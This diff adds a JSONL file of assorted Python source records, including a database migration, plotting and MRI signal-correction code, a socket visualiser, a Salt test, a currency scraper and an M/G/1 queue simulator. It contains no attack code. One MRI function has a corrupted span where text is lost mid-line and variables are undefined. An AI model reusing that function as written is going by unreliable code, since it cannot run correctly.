diff --git "a/4795.jsonl" "b/4795.jsonl" new file mode 100644--- /dev/null +++ "b/4795.jsonl" @@ -0,0 +1,720 @@ +{"seq_id":"400216248","text":"from opengever.core.upgrade import SchemaMigration\nfrom plone import api\nfrom sqlalchemy import Column\nfrom sqlalchemy import Text\nfrom sqlalchemy.sql.expression import column\nfrom sqlalchemy.sql.expression import table\n\n\nmeeting_table = table(\"meetings\",\n column(\"id\"),\n column(\"title\"),\n column(\"location\"),\n column(\"start_datetime\"))\n\n\nclass AddTitleColumnToMeeting(SchemaMigration):\n \"\"\"Add title column to meeting.\n \"\"\"\n\n def migrate(self):\n self.add_column()\n self.migrate_data()\n self.make_column_non_nullable()\n\n def add_column(self):\n self.op.add_column(\n 'meetings',\n Column('title', Text, nullable=True))\n\n def migrate_data(self):\n for meeting in self.execute(meeting_table.select()):\n self._set_title(meeting)\n\n def _set_title(self, meeting):\n self.execute(meeting_table\n .update()\n .where(meeting_table.c.id == meeting.id)\n .values(title=self._generate_title(meeting)))\n\n def _generate_title(self, meeting):\n date = api.portal.get_localized_time(datetime=meeting.start_datetime)\n if meeting.location:\n return u\"{}, {}\".format(meeting.location, date)\n return date\n\n def make_column_non_nullable(self):\n self.op.alter_column('meetings', 'title',\n existing_type=Text, nullable=False)\n","sub_path":"opengever/meeting/upgrades/20160218114243_add_title_column_to_meeting/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"303409155","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\nfrom cycler import cycler\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport sys\nfrom os.path import exists\n\n\nsys.path.append(\"..\")\nfrom importar_datos import importar_mag_1s, importar_swea, importar_swia\nfrom funciones import Bpara_Bperp, UTC_to_hdec, donde\n\nplt.rcParams[\"axes.prop_cycle\"] = cycler(\n \"color\",\n [\"#003f5c\", \"#ffa600\", \"#de425b\", \"#68abb8\", \"#f3babc\", \"#6cc08b\", \"#cacaca\"],\n)\n\nfor grupo in [1, 2, 3, 4]:\n # grupo = input(\"grupo\\n\")\n lista = np.genfromtxt(\n f\"../outputs/grupo{grupo}/jacob_dayside.txt\", skip_header=1, dtype=str\n )\n fig_path = f\"../../Pictures/BS_MPB/grupo{grupo}_Jacob/\"\n\n for l in lista:\n year, month, day = l[0].split(\"-\")\n if not exists(\n fig_path + f\"{year}-{month}-{day}-{l[1]}.png\"\n ): # si no está ya la figura\n t_1 = UTC_to_hdec(l[1])\n t_mpb = UTC_to_hdec(l[2])\n t_2 = UTC_to_hdec(l[3])\n\n if t_1 < t_mpb:\n ti = t_1 - 0.5\n tf = t_mpb + 0.5\n else:\n ti = t_mpb - 0.5\n tf = t_1 + 0.5\n if ti < 0:\n ti = 0\n if tf > 24:\n tf = 24\n\n mag, t, B, pos = importar_mag_1s(year, month, day, ti, tf)\n swea, t_swea, energia, flux_plot = importar_swea(year, month, day, ti, tf)\n swia, t_swia, i_density, i_temp, vel_mso = importar_swia(\n year, month, day, ti, tf\n )\n energias = [50 + i * 25 for i in range(6)]\n if type(t_swea) != int:\n JE_pds = np.zeros((len(t_swea), len(energias)))\n\n for i, e in enumerate(energias):\n j = donde(energia, e)\n JE_pds[:, i] = flux_plot[j]\n else:\n JE_pds = 0\n\n Bnorm = np.linalg.norm(B, axis=1)\n Bpara, Bperp, tpara = Bpara_Bperp(B, t, ti, tf)\n\n plt.clf()\n fig = plt.figure(1, constrained_layout=True)\n fig.subplots_adjust(\n top=0.95,\n bottom=0.1,\n left=0.05,\n right=0.95,\n hspace=0.005,\n wspace=0.15,\n )\n plt.title(\"Spacebar when ready to click:\")\n\n ax1 = plt.subplot2grid((3, 2), (0, 0))\n ax2 = plt.subplot2grid((3, 2), (1, 0), sharex=ax1)\n ax3 = plt.subplot2grid((3, 2), (2, 0), sharex=ax1)\n ax4 = plt.subplot2grid((3, 2), (0, 1), sharex=ax1)\n ax5 = plt.subplot2grid((3, 2), (1, 1), sharex=ax1)\n ax6 = plt.subplot2grid((3, 2), (2, 1), sharex=ax1)\n\n ax1.plot(tpara, Bpara, label=r\"|$\\Delta B \\parallel$| / B\")\n ax1.plot(tpara, Bperp, \"-.\", label=r\"|$\\Delta B \\perp$| / B\")\n plt.setp(ax1.get_xticklabels(), visible=False)\n ax1.set_ylabel(r\"|$\\Delta B$|/ B\")\n ax1.set_xlim([t[0], t[-1]])\n if max(Bpara) > 1:\n ax1.set_ylim([-0.1, 1])\n ax1.grid()\n ax1.legend()\n ax1.set_title(f\"{year}-{month}-{day}\")\n\n ax2.plot(t, B)\n plt.setp(ax2.get_xticklabels(), visible=False)\n ax2.set_ylabel(\"Bx, By, Bz (nT)\")\n ax2.legend([\"Bx\", \"By\", \"Bz\"])\n ax2.grid()\n\n ax3.plot(t, Bnorm)\n ax3.grid()\n if max(Bnorm) > 70 and Bnorm[donde(t, t_mpb)] < 40:\n ax2.set_ylim([-50, 50])\n ax3.set_ylim([0, 50])\n if Bnorm[donde(t, t_mpb)] < 20:\n ax2.set_ylim([-20, 20])\n ax3.set_ylim([0, 30])\n elif max(Bnorm) > 70 and Bnorm[donde(t, t_mpb)] > 40:\n ax2.set_ylim([-100, 100])\n ax3.set_ylim([0, 100])\n ax3.axvline(x=t_1, color=\"c\")\n ax3.set_ylabel(\"|B| (nT)\")\n ax3.set_xlabel(\"Tiempo (hdec)\")\n\n plt.setp(ax4.get_xticklabels(), visible=False)\n ax4.set_xlabel(\"Tiempo (hdec)\")\n ax4.set_ylabel(\"proton velocity\")\n ax4.plot(t_swia, vel_mso)\n ax4.grid()\n\n plt.setp(ax5.get_xticklabels(), visible=False)\n ax5.set_ylabel(\"Densidad de p+ \\n del SW (cm⁻³)\")\n ax5.plot(t_swia, i_density)\n if type(i_density) != int:\n if max(i_density) > 30 and i_density[donde(t_swia, t_mpb)] < 20:\n ax5.set_ylim([-0.1, 20])\n ax5.grid()\n\n ax6.semilogy(t_swea, JE_pds)\n ax6.legend(energias, loc=\"upper right\")\n ax6.grid()\n ax6.set_ylabel(\"Diff. en. flux\")\n # if swea != 0:\n # ax6.set_ylabel(\"Energia\", picker=True) # , bbox=dict(facecolor='red'))\n # plt.setp(ax6.get_xticklabels(), visible=False)\n # im = plt.imshow(\n # flux_plot,\n # aspect=\"auto\",\n # origin=\"lower\",\n # extent=(t_swea[0], t_swea[-1], energia[-1], energia[0]),\n # cmap=\"inferno\",\n # norm=LogNorm(vmin=1e4, vmax=1e9),\n # )\n # divider = make_axes_locatable(ax6)\n # cax = divider.append_axes(\"top\", size=\"7%\", pad=\"1%\")\n # cb = plt.colorbar(im, cax=cax, orientation=\"horizontal\")\n # cax.xaxis.set_ticks_position(\"top\")\n\n for ax in [ax1, ax2, ax3, ax4, ax5, ax6]:\n ax.axvline(x=t_1, c=\"m\", label=\"t1\")\n ax.axvline(x=t_2, c=\"b\", label=\"t2\")\n ax.axvline(x=t_mpb, c=\"g\", label=\"mpb\")\n\n figure = plt.gcf() # get current figure\n figure.set_size_inches(16, 8)\n # when saving, specify the DPI\n plt.savefig(fig_path + f\"{year}-{month}-{day}-{l[1]}.png\", dpi=150)\n # plt.show()\n","sub_path":"bs_mpb/graficador.py","file_name":"graficador.py","file_ext":"py","file_size_in_byte":5956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"65123898","text":"from scipy.interpolate import LSQUnivariateSpline\nfrom scipy.stats import mode\nimport collections\nfrom python.mri_python.varian_read_file import *\nfrom itertools import combinations\nfrom numpy.fft import *\nfrom scipy.linalg import lstsq\n\ndef phase_drift_corr(inputAcq,petable,imouse=None,petable_arrays=('t1','t2')):\n if (inputAcq.platform!=\"Varian\"):\n \"Function phase_drift_corr only functions for Varian acquisitions...\"\n raise SystemExit\n print('Estimating smoothed phase drift correction...')\n #get repeated k0 grabs\n nacq = int(get_dict_value(inputAcq.param_dict,'np',1)/2)\n nro = int(get_dict_value(inputAcq.param_dict,'nro',1))\n etl = int(get_dict_value(inputAcq.param_dict,'etl',1))\n nrcvrs = inputAcq.nrcvrs\n nmice = inputAcq.nmice\n if (nmice>nrcvrs):\n nmice=nrcvrs\n t1_array = parse_petable_file(petable,petable_arrays[0])\n t2_array = parse_petable_file(petable,petable_arrays[1])\n i1 = nonzero( (t1_array==0)*(t2_array==0) )[0]\n if (len(i1)<20):\n print('Too few k0 grabs for phase drift correction...')\n return ones(len(t1_array),float)\n if (etl>1):\n print('Phase drift correction not ready for etl>1...')\n return zeros(len(t1_array),float)\n if (imouse==None):\n mouselist = range(nmice)\n else:\n mouselist = [imouse]\n k0_data = zeros((len(mouselist), len(i1), nacq), complex)\n for k in range(len(mouselist)):\n for j in range(len(i1)):\n fid_data,data_error = inputAcq.getdatafids(i1[j],i1[j]+1,rcvrnum=k)\n k0_data[k,j,:]=fid_data.copy()\n #evaluate phase drift from k0 grabs\n maxind = k0_data.shape[-1]-nro+argmax(abs(k0_data[0,0,-nro:]),axis=-1)\n phasecorr = zeros((len(mouselist),len(t2_array)),complex)\n Nacqs = len(t2_array)\n i1mod = append(i1,len(t2_array)) \n for j in range(k0_data.shape[0]):\n refangles = unwrap(angle( k0_data[j,:,maxind] ))\n refangles = append(refangles,median(refangles[-11::])) # artificially add a last point to limit \n # behaviour at the end\n splsmooth = LSQUnivariateSpline(i1mod,refangles,t=arange(Nacqs/3,int(0.8*Nacqs),Nacqs/3))\n smoothphase = splsmooth(arange(Nacqs))\n smoothphase = median(smoothphase)-smoothphase #this flips the sign\n phasecorr[j,:] = exp(1.j*smoothphase)\n return phasecorr\n\n\ndef get_corrected_datafids(inputAcq,fid_start,fid_end,mouse_num=0,phasecorr=None,dcpl_info=None,dcpl_ppe_index=0):\n if (inputAcq.platform!=\"Varian\"):\n \"Function get_corrected_datafids only functions for Varian acquisitions...\"\n raise SystemExit\n if ((dcpl_info is None) and (phasecorr is None)): #no corrections to apply\n fid_data,data_error = inputAcq.getdatafids(fid_start,fid_end,rcvrnum=mouse_num)\n elif (dcpl_info is None) and (phasecorr is not None):\n fid_data,data_error = inputAcq.getdatafids(fid_start,fid_end,rcvrnum=mouse_num)\n fid_data = fid_data*phasecorr[mouse_num,fid_start:fid_end,newaxis]\n else:\n cgrp = nonzero( abs(dcpl_info.invCij[mouse_num,:])>1e-4 )[0]\n #start = dcpl_info.rok0index-dcpl_info.nro/2\n #end = start+dcpl_info.nro\n np = inputAcq.header_info[2]\n fid_data = zeros((fid_end-fid_start,int(np/2)),complex) #dcpl_info.nro\n for j in cgrp:\n cfid,data_error = inputAcq.getdatafids(fid_start,fid_end,rcvrnum=j)\n fid_data += cfid[:,:]* \\\n dcpl_info.invCij[mouse_num,j]* \\\n exp(-1.j*2*pi*(arange(cfid.shape[-1])-dcpl_info.rok0index)*dcpl_info.roposition[j]/dcpl_info.nro)* \\\n exp(1.j*dcpl_info.ppeshift[j]*dcpl_ppe_index)\n if (phasecorr is not None):\n fid_data = fid_data*phasecorr[mouse_num,fid_start:fid_end,newaxis] \n if (data_error):\n print('Unable to retrieve all fids (%d,%d)...' % (fid_start,fid_end))\n return fid_data\n\n\n\ndef rep_pos_corr(inputAcq,petable,imouse=None,petable_arrays=('t1','t2'),corrmat=64,phasedriftcorr=None):\n if (inputAcq.platform!=\"Varian\"):\n \"Function get_corrected_datafids only functions for Varian acquisitions...\"\n raise SystemExit\n print('Estimating position shift between reps...')\n nacq = int(get_dict_value(inputAcq.param_dict,'np',1))/2\n nro = int(get_dict_value(inputAcq.param_dict,'nro',1))\n etl = int(get_dict_value(inputAcq.param_dict,'etl',1))\n nv = int(get_dict_value(inputAcq.param_dict,'nv',1))\n nv2 = int(get_dict_value(inputAcq.param_dict,'nv2',1))\n grappafov = int(get_dict_value(inputAcq.param_dict,'grappafov',1))\n t1_array = parse_petable_file(petable,petable_arrays[0])\n t2_array = parse_petable_file(petable,petable_arrays[1])\n i1 = nonzero( (t1_array/grappafov>-corrmat/2)*(t1_array/grappafov<=corrmat/2)* \\\n (t2_array/grappafov>-corrmat/2)*(t2_array/grappafov<=corrmat/2)* \\\n (t1_array%grappafov==0)*(t2_array%grappafov==0) )[0]\n noutreps = int( mode(array( collections.Counter(t1_array[i1]+nv/2-1+nv*(t2_array[i1]+nv2/2-1)).most_common() )[:,1])[0][0] )\n if (etl>1):\n print('Correction not ready for etl>1...')\n return ones(len(t1_array),float)\n if (imouse==None):\n mouselist = range(inputAcq.nmice)\n else:\n mouselist = [imouse]\n if (phasedriftcorr==None):\n phasedriftcorr=ones((len(mouselist),len(t1_array)),float)\n kdata = zeros((len(mouselist),noutreps,corrmat,corrmat,nacq),complex)\n for k in range(len(mouselist)):\n for q in range(corrmat):\n for r in range(corrmat):\n inds = i1[ nonzero( (t1_array[i1]==(r-corrmat/2+1)*grappafov)*(t2_array[i1]==(q-corrmat/2+1)*grappafov) )[0] ]\n repstep = len(inds)/noutreps\n for j in range(len(inds)):\n fid_data,data_error = inputAcq.getdatafids(fid_start,fid_end,rcvrnum=k)\n kdata[k,[noutreps-1,j/repstep][j/repstep=noutreps,noutreps-1,repind)\n for j in range(len(mouselist)):\n p=zeros((2*noutreps,),float)\n peshifts=PEadjustment(kplanes[j,:,:,:])\n delphase = exp(1.j*2*pi*(arange(nv2)-nv2/2)[newaxis,:]*peshifts[:,0,newaxis]/corrmat)[:,:,newaxis]* \\\n exp(1.j*2*pi*(arange(nv)-nv/2)[newaxis,:]*peshifts[:,1,newaxis]/corrmat)[:,newaxis,:]\n phasedriftcorr[j,:] = phasedriftcorr[j,:]*delphase[repind,t2_array/grappafov+nv2/2-1,t1_array/grappafov+nv/2-1]\n print(\"PE2 pixel shifts (image %d): \"%mouselist[j],peshifts[:,0]*float(nv2)/float(corrmat))\n print(\"PE1 pixel shifts (image %d): \"%mouselist[j],peshifts[:,1]*float(nv)/float(corrmat))\n return phasedriftcorr \n\n\ndef PEshift(kplane1,kplane2,retpixshift=True):\n # need to select planes instead of lines\n angdiff = angle(kplane1*conj(kplane2))\n A=ones((prod(angdiff.shape),3),float)\n A[:,0]=arange(prod(angdiff.shape))/angdiff.shape[1]-angdiff.shape[0]/2\n A[:,1]=arange(prod(angdiff.shape))%angdiff.shape[1]-angdiff.shape[1]/2 \n x,resids,rank,s = lstsq(A,ravel(angdiff))\n if (retpixshift):\n return x[0]*angdiff.shape[0]/(2*pi),x[1]*angdiff.shape[1]/(2*pi)\n else:\n return x\n\n\ndef PEadjustment(kmdata):\n pepos = zeros((kmdata.shape[0],2),float)\n A = array([],float); b = array([],float); w = array([],float)\n for j in range(2):\n Arow = zeros((2*kmdata.shape[0],),float); Arow[j::2] = 1.0\n A = append(A,Arow)\n b = append(b,0)\n for q in combinations(arange(kmdata.shape[0]),2):\n pe2shift,pe1shift = PEshift(kmdata[q[0]],kmdata[q[1]])\n Arow = zeros((2*kmdata.shape[0],),float); \n Arow[2*q[0]] = 1; Arow[2*q[1]] = -1\n A = append(A,Arow); b = append(b,pe2shift); \n Arow = zeros((2*kmdata.shape[0],),float); \n Arow[2*q[0]+1] = 1; Arow[2*q[1]+1] = -1\n A = append(A,Arow); b = append(b,pe1shift); \n A.shape = (len(b),len(A)/len(b))\n pefitpos,resids,rank,s = lstsq(A,b)\n pefitpos.shape=(kmdata.shape[0],2)\n return -1*pefitpos\n\n \n","sub_path":"python/mri_python/varian_fid_corrections.py","file_name":"varian_fid_corrections.py","file_ext":"py","file_size_in_byte":8672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"450974208","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport time\nimport math\n\nimport socket\nimport struct\nimport sys\nimport threading\n\nangles = [0,0,0]\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ns.bind(('0.0.0.0', 6000))\ns.listen(0)\nclient, addr = s.accept()\nclient.settimeout(5)\n\nangles = [0,0,0]\n\ndef get_data(client):\n global angles \n while(1):\n content = client.recv(1024)\n angles_temp = []\n if len(content) == 73:\n for j in [10,11,12]:\n float_bytes = ''\n for k in range(4):\n float_bytes = float_bytes + '%.2x'%(content[(3-k)+j*4])\n float_data = struct.unpack('!f', bytes.fromhex(float_bytes))[0]\n angles_temp.append(float_data)\n angles = angles_temp\n else:\n print('...')\n pass\n\n\nx = threading.Thread(target=get_data, args=(client,))\nx.daemon = True\nx.start()\n\n\n\ndef show3Dpose(vals, ax, lcolor=\"#3498db\", rcolor=\"#e74c3c\"): # blue, orange\n I = np.array([1,2,5,4,6,5]) # start points\n J = np.array([3,3,3,5,5,7]) # end points\n LR = np.array([1,0,1,1,0,0], dtype=bool)\n for i in np.arange( len(I) ):\n x, y, z = [np.array( [vals[I[i], j], vals[J[i], j]] ) for j in range(3)]\n ax.plot(x, y, z, lw=2, c=lcolor if LR[i] else rcolor)\n\n\n#fig = plt.figure(figsize=(19.2, 10.8))\nfig = plt.figure(figsize=(10.8/2, 10.8/2))\nax = Axes3D(fig)\nRADIUS = 200\nax.set_xlim3d([-RADIUS, RADIUS])\nax.set_zlim3d([0, RADIUS*2])\nax.set_ylim3d([-RADIUS, RADIUS])\n\nax.set_xticks([])\nax.set_yticks([])\nax.set_zticks([])\n\nax.get_xaxis().set_ticklabels([])\nax.get_yaxis().set_ticklabels([])\nax.set_zticklabels([])\n\nwhite = (1.0, 1.0, 1.0, 0.0)\nax.w_xaxis.set_pane_color(white)\nax.w_yaxis.set_pane_color(white)\n# Keep z pane\n\nax.w_xaxis.line.set_color(white)\nax.w_yaxis.line.set_color(white)\nax.w_zaxis.line.set_color(white)\n\n\n\nvals = np.zeros((10,3))\nvals[1] = [0,-25,0]\nvals[2] = [0,25,0]\nvals[3] = [0,0,100]\nvals[4] = [0,-30,80]\nvals[5] = [0,0,150]\nvals[6] = [0,30,80]\nvals[7] = [0,0,170]\n\nwhile(1):\n t1 = time.time()\n #print(angles[2])\n angle_rad = math.radians(angles[2])\n vals[2,0] = 100 * math.sin(angle_rad)\n vals[2,2] = 100 - 100 * math.cos(angle_rad)\n show3Dpose(vals, ax)\n plt.pause(0.04)\n del ax.lines[:]\n t2 = time.time()\n #print((t2-t1)*1000)\n\nshow3Dpose(vals, ax)\nplt.show()\n\n\n","sub_path":"skeleton_wifi.py","file_name":"skeleton_wifi.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"108486553","text":"# -*- coding: utf-8 -*-\n'''\n :codeauthor: Tyler Johnson (tjohnson@saltstack.com)\n\n\n tests.integration.states.cpan\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'''\n\n# Import python libs\nfrom __future__ import absolute_import, print_function, unicode_literals\nimport logging\n\n# Import Salt Testing libs\nfrom tests.support.case import ModuleCase\nfrom tests.support.helpers import destructiveTest, requires_system_grains\nfrom tests.support.mixins import SaltReturnAssertsMixin\n\n# Import salt libs\nimport salt.utils.path\n\nlog = logging.getLogger(__name__)\n\n__testcontext__ = {}\n\n\n@destructiveTest\nclass CpanStateTest(ModuleCase, SaltReturnAssertsMixin):\n @requires_system_grains\n def setUp(self, grains=None): # pylint: disable=arguments-differ\n '''\n Ensure that cpan is installed through perl\n '''\n super(CpanStateTest, self).setUp()\n if 'cpan' not in __testcontext__:\n # Install perl\n self.assertSaltTrueReturn(self.run_state('pkg.installed', name='perl'))\n # Install cpan or docs\n cpan_docs = 'cpan'\n if grains['os_family'] == 'RedHat':\n cpan_docs = 'perl-CPAN'\n elif grains['os_family'] == 'Arch':\n cpan_docs = 'perl-docs'\n elif grains['os_family'] == 'Debian':\n cpan_docs = 'perl-doc'\n self.assertSaltTrueReturn(self.run_state('pkg.installed', name=cpan_docs))\n # Verify that the cpan binary exists on the system\n self.assertTrue(str(salt.utils.path.which('cpan')).endswith('cpan'), \"cpan not installed\")\n __testcontext__['cpan'] = True\n\n def test_cpan_installed_removed(self):\n '''\n Tests installed and removed states\n '''\n name = 'File::Temp'\n ret = self.run_function('cpan.show', module=name)\n self.assertIsInstance(ret, dict, \"Return value should be a dictionary, instead got: {}\".format(ret))\n version = ret.get('installed version', None)\n if version and (\"not installed\" not in version):\n # For now this is not implemented as state because it is experimental/non-stable\n self.run_function('cpan.remove', (name,))\n\n ret = self.run_state('cpan.installed', name=name)\n self.assertSaltTrueReturn(ret)\n\n # For now this is not implemented as state because it is experimental/non-stable\n self.run_function('cpan.remove', module=name)\n\n def test_missing_cpan(self):\n '''\n Test cpan not being installed on the system\n '''\n module = \"Nonexistant::Module\"\n # Use the name of a binary that doesn't exist\n bin_env = \"no_cpan\"\n ret = self.run_state('cpan.installed', name=module, bin_env=bin_env)\n self.assertSaltFalseReturn(ret)\n self.assertInSaltComment(\n 'Make sure `{}` is installed and in the PATH'.format(bin_env), ret)\n","sub_path":"tests/integration/states/test_cpan.py","file_name":"test_cpan.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"410351427","text":"import json\nfrom math import radians, cos, sin, asin, sqrt\nfrom bs4 import BeautifulSoup\nimport requests\n\nCURRENCY_INDEX = {\n (\"buy\", \"USD\"):0,\n (\"sell\", \"USD\"):1,\n (\"buy\", \"EUR\"):2,\n (\"sell\", \"EUR\"):3,\n (\"buy\", \"RUB\"):4,\n (\"sell\", \"RUB\"):5\n}\n\nuser_requests = {}\n\npage_html = requests.get(\"https://myfin.by/currency/minsk\").text \nSOUP_PAGE = BeautifulSoup(page_html, 'html.parser')\nwith open(\"bank_locations.json\", \"r\") as b:\n BANK_LOCATIONS= json.load(b)\n\ndef distance(user_location, bank_location):\n b_lat, b_long = bank_location[\"latitude\"], bank_location[\"longitude\"]\n u_lat, u_long = user_location.latitude, user_location.longitude\n lon1, lat1, lon2, lat2 = map(radians, [b_long, b_lat, u_long, u_lat])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n km = 6367 * c\n return km\n\n\ndef within_km(user_location, bank_location):\n km = distance(user_location, bank_location)\n return km <= 1\n\ndef course_info(bank, operation, curr):\n c_index = CURRENCY_INDEX[(operation, curr)]\n if curr==\"RUB\":\n curr=\"100 RUB\"\n else:\n curr=\"1 \"+curr\n title = bank.select(\"div.ttl > a\")[0].getText()\n phone = bank.select(\"div.tel\")[0].getText()\n address = bank.select(\"div.address\")[0].getText()\n course = \"%s за %s BYN\" % (curr,\n bank.select(\"td > span.first_curr\")[c_index].getText())\n return [title, phone, address, course]\n\n\ndef stringify_response(curr_list, operation):\n response = sorted(curr_list, key=lambda x: x[3])\n if operation == \"buy\":\n response.reverse()\n response = map(\"\\n\".join, response)\n response = map(lambda x: x.strip(), response)#remove empty values from each elem\n response = (\"\\n\"+((\"*\")*26)+\"\\n\").join(response)\n operation = \"БАНКИ ПРОДАЮТ\\n\\n\" if operation=='sell' else \"БАНКИ ПОКУПАЮТ\\n\\n\"\n response = operation+response\n return response\n\n\ndef currency_response(user_location, operation, currency):\n closest_banks = [ad for ad, loc in BANK_LOCATIONS.items() if within_km(user_location, loc)]\n if not closest_banks:\n distances = ((ad, distance(user_location, loc)) for ad, loc in BANK_LOCATIONS.items())\n distances = sorted(distances, key=lambda x: x[1])[0:3]\n closest_banks = [ad[0] for ad in distances]\n banks = SOUP_PAGE.select(\"tr.currency_row_1\")\n unsorted_curr_list = [course_info(b, operation, currency) for b in banks if b.select(\"div.address\")[0].getText() in closest_banks]\n response = stringify_response(unsorted_curr_list, operation)\n return response","sub_path":"currency_parser.py","file_name":"currency_parser.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"576228280","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\n# ##### BEGIN AUTOGENERATED I18N SECTION #####\n\n# Tuple of tuples (key, (sources, comments), (lang, translation, (is_fuzzy, comments)), ...)\ntranslations_tuple = (\n ((None, \"Allows to copy a selection of render settings from current scene to others.\"),\n ((), ()),\n (\"fr\", \"Permet de copier une sélection des réglages de rendu depuis la scène courante vers d’autres scènes.\",\n (False, ())),\n ),\n)\n\ntranslations_dict = {}\nfor msg in translations_tuple:\n key = msg[0]\n for lang, trans, (is_fuzzy, comments) in msg[2:]:\n if trans and not is_fuzzy:\n translations_dict.setdefault(lang, {})[key] = trans\n\n# ##### END AUTOGENERATED I18N SECTION #####\n","sub_path":"render_copy_settings/translations.py","file_name":"translations.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"160121048","text":"import numpy as np\nimport math\nimport scipy.stats as stats\nfrom abc import ABCMeta, abstractmethod\nimport distributions \nimport utils_math\nfrom problems import ABC_problems\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport time\n\n\nclass MG1_Problem(ABC_problems.ABC_Problem):\n\n '''\n The M/G/1 problem with three parameters: ~ [a, a+delta], ~ lambda\n '''\n\n def __init__(self, N=100, n=50):\n\n self.N = N # number of parameter samples\n self.n = n # number of data samples in each simulation\n\n self.prior = [distributions.uniform, distributions.uniform, distributions.uniform]\n self.prior_args = np.array([[0, 4], [2, 6], [0, 0.33]])\n self.simulator_args = ['alpha', 'delta', 'lambda'] # just for information\n self.K = 3 # number of parameters\n\n self.true_alpha = 1\n self.true_delta = 4\n self.true_lambda = 0.2\n\n def get_true_theta(self):\n return np.array([self.true_alpha, self.true_delta, self.true_lambda])\n\n def statistics(self, data, theta=None):\n # quantile as summary statistics\n n_quantiles = 20\n dim = data.shape[1]\n prob = np.linspace(0.025, 0.975, n_quantiles)\n stat = np.zeros([1, n_quantiles*dim])\n for k in range(dim):\n quantiles = stats.mstats.mquantiles(data[:, k], prob)\n stat_k = quantiles\n stat[0, k*n_quantiles : (k+1)*n_quantiles] = np.array(stat_k)\n return stat\n \n def simulator(self, theta):\n # get the params\n Alpha = theta[0]\n Delta = theta[1]\n Lambda = theta[2]\n\n # service times (uniformly distributed)\n sts = distributions.uniform.draw_samples(Alpha, Alpha + Delta, self.n)\n\n # interarrival times (exponentially distributed)\n iats = distributions.exponential.draw_samples(Lambda, self.n)\n\n # arrival times\n ats = np.cumsum(iats)\n\n # interdeparture and departure times\n idts = np.empty(self.n)\n dts = np.empty(self.n)\n\n idts[0] = sts[0] + ats[0]\n dts[0] = idts[0]\n\n for i in range(1, self.n):\n idts[i] = sts[i] + max(0.0, ats[i] - dts[i-1])\n dts[i] = dts[i-1] + idts[i]\n\n return np.atleast_2d(idts).T\n\n def sample_from_prior(self):\n sample_alpha = self.prior[0].draw_samples(self.prior_args[0, 0], self.prior_args[0, 1], 1)[0]\n sample_delta = self.prior[1].draw_samples(self.prior_args[1, 0], self.prior_args[1, 1], 1)[0]\n sample_lambda = self.prior[2].draw_samples(self.prior_args[2, 0], self.prior_args[2, 1], 1)[0]\n return np.array([sample_alpha, sample_delta, sample_lambda])\n\n def visualize(self):\n\n # have a look at the problem\n\n plt.figure()\n t = np.linspace(0, self.n, self.n).astype(int)\n x = self.data_obs.reshape(-1)\n plt.rcParams[\"patch.force_edgecolor\"] = True\n n, bins, patches = plt.hist(x, bins=80, facecolor='orchid', alpha=0.5)\n plt.xlabel(r'inter-departure time $\\Delta t$')\n plt.ylabel(r'data y')\n plt.show()","sub_path":"problems/problem_MG1.py","file_name":"problem_MG1.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"389628036","text":"from flask.ext.script import Manager, Command, Option\nfrom main.main import app\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import ProgrammingError\nfrom main.database import Base, db_session\nfrom main.Flask_configs import Config, DevConfig\nfrom main.BUser.models import User\nfrom main.BOrder.models import Order\nfrom main.BMeal.models import Meal\nfrom main.BComment.models import Comment\nimport random\nimport requests\nimport datetime\nimport json\n\nmanager = Manager(app)\n\n\nclass Hello(Command):\n \"\"\"prints hello world\"\"\"\n\n def run(self):\n print(\"hello world\")\n\n\nclass InitDB(Command):\n \"\"\"\n Updates database with new models.\n \"\"\"\n\n def __init__(self):\n self.sql_url = Config.SQLALCHEMY_DATABASE_URI\n self.create_engine = create_engine\n self.Base = Base\n\n def run(self):\n self.engine = self.create_engine(self.sql_url, echo=True)\n self.Base.metadata.drop_all(bind=self.engine)\n print(\"Database dropped.\")\n self.Base.metadata.create_all(bind=self.engine)\n print(\"Database created.\")\n\n\nclass PopulateMeals(Command):\n \"\"\"\n Creates fake meals.\n \"\"\"\n def __init__(self):\n pass\n\n def run(self):\n with open('./demo_meals.json', 'r') as f:\n meals = json.load(f)\n\n for meal in meals:\n 